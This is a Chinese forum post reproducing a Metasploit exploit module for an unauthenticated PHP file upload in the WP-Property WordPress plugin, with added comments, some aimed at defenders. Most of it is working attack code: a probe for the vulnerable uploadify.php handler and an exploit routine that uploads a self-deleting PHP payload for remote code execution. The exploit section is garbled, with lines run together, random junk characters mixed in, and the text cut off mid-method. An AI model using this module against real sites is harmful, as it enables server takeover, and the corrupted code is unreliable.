标题: WordPress WP-Property PHP 文件上传漏洞
作者: admin 时间: 2013-1-4 19:51

WordPress WP-Property PHP 文件上传漏洞

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

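require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit module describing the unauthenticated file upload in the
# WP-Property WordPress plugin. Per the module description, releases up to
# and including 1.35.0 are affected and the flaw is reached through the
# plugin's uploadify.php file. This page does not state a fixed version;
# the advisories listed under 'References' are the place to confirm one.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # The forum listing printed this as "Msf::Exploit:hpEXE" (the ":P" was
  # presumably swallowed by emoticon rendering). PhpEXE is the mixin that
  # matches the 'msf/core/exploit/php_exe' require above.
  include Msf::Exploit::PhpEXE

  # Registers the module metadata and its single user-facing option.
  #
  # @param info [Hash] metadata supplied by the framework; it is merged with
  #   the values below through update_info.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      # Advisory identifiers for cross-referencing scanner findings and
      # vendor notices against this issue.
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          # NUL bytes are excluded from the generated payload.
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      # Index into 'Targets': the generic PHP entry.
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        # Base path of the WordPress installation on the tested host.
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end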
# Probes for the plugin's bundled uploadify handler with a single GET request.
#
# Only the HTTP status is inspected. A 200 response yields CheckCode::Appears;
# no response, or any other status, yields CheckCode::Unknown. The plugin
# version is never read, so "Appears" means the handler file is reachable,
# not that the installed release is confirmed vulnerable.
#
# For defenders, the request path built below is the one to look for in web
# server access logs, and the file to confirm absent or access-restricted.
#
# @return an Exploit::CheckCode value (Unknown or Appears)
def check
  base = target_uri.path
  # Make sure the base path ends in a slash before the plugin path is appended.
  base << '/' unless base.end_with?('/')

  handler = "#{base}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
  res = send_request_cgi({
    'method' => 'GET',
    'uri'    => handler
  })

  return Exploit::CheckCode::Unknown if !res || res.code != 200

  Exploit::CheckCode::Appears
end

def exploit
  uri = target_uri.path
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true) 6 ?/ p/ Q3 B7 ?6 L& S8 H/ J 6 Q9 n6 x. G# Ydata = Rex::MIME::Message.new+ S% f- {- q5 ]2 Y p: r M
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")- S9 T; o* \6 T+ Q9 n9 S# s
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"") : N0 x7 P. V1 b+ J8 S. Q4 \# xpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') 4 M6 p# E U6 C$ p1 p, N$ o3 ^ / I( u0 g9 ] F7 y, Bprint_status("#{peer} - Uploading payload #{@payload_name}")3 E. m! z5 H; t9 U! W- \
res = send_request_cgi({0 r9 B t$ A- X
'method' => 'POST',0 `3 x- g2 U) X/ P, U$ q& Q
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php", 2 Z6 V% m5 r. j, F$ C'ctype' => "multipart/form-data; boundary=#{data.bound}",& F+ }2 U: v! L* l- X* j
'data' => post_data/ ^1 X; b2 E; H6 V) h6 D9 E7 I
}) ! V; V# s# B \- i$ r( R/ P' w% r( W2 s7 D& O' |4 w G; q
if not res or res.code != 200 or res.body !~ /#{@payload_name}/ 1 z H6 e; {) f. z3 qfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")% W7 z4 X, M) Y! i6 q
end {! M0 U) ]+ Y+ `8 h+ C7 T R0 W% ~* w! n6 n6 v
upload_uri = res.body4 k8 q V! M3 H+ A r. T